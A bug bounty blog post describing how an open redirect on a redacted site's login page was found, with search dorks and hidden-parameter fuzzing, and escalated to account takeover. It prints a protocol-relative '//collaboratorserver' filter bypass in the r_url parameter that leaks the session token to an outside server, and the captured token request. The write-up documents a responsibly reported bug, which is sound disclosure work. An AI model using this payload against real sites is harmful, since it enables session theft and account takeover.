Hi Everyone,
How you all doing. In this article, I’m going to talk about a Open redirect bug I discovered in an self hosted bug bounty program which i m going to represent as redacted that allowed me to get paid 200$ in bounty.
By combining some dorks, I found a lot of fresh targets that no one had touched until now.
I chose this random target and crawled the site for 5 minutes.
Observed that there was only a single login page and checked every test case, but no luck. I crawled and fuzzed the whole website for a register button but found nothing.
At last, I used dorks to find the register page.
site:redacted.com "register" OR "signup" OR "registration"After trying the above dork in Bing, I found a register page.
I successfully registered an account, and when I tried to log in, I thought, why don’t I check for hidden parameters on the login page?
After running Arjun, X8, and GAP on the login page, I found a hit with the r_url parameter existing.
I added ?r_url to the login page and included my collaborator link to escalate the impact, but it was not accepting any other domains.
https://redacted.com/user/login?r_url=https://collaboratorserver - ERRORI used a simple bypass trick to get around this.
https://redacted.com/user/login?r_url=//collaboratorserver - OKAfter logging in, the collaborator server received an HTTP hit with the token, and I was like,
WOW !! Account Takeover !!
GET /?token=xxxxxxxxx HTTP/1.1I added this token to the Cookie Editor extension and appended /dashboard to the root URL. I accessed the dashboard with the token I received on my server.
I created a proper POC and sent it to the team. Within 10 minutes, I received a response stating that it was a valid bug and eligible for a bounty, and they asked for my PayPal email to process the payment.
After 20 minutes, I received a $200 bounty in my PayPal for the bug. I was actually expecting something higher, like more than $500, but when I asked about it, they replied that it was a startup and this was the highest bounty payout from their side.
Thank you for reading!
Stay tuned for more insights and updates. Don’t forget to follow my blog for the latest posts.
You can also connect with me on LinkedIn: Surya Arigela
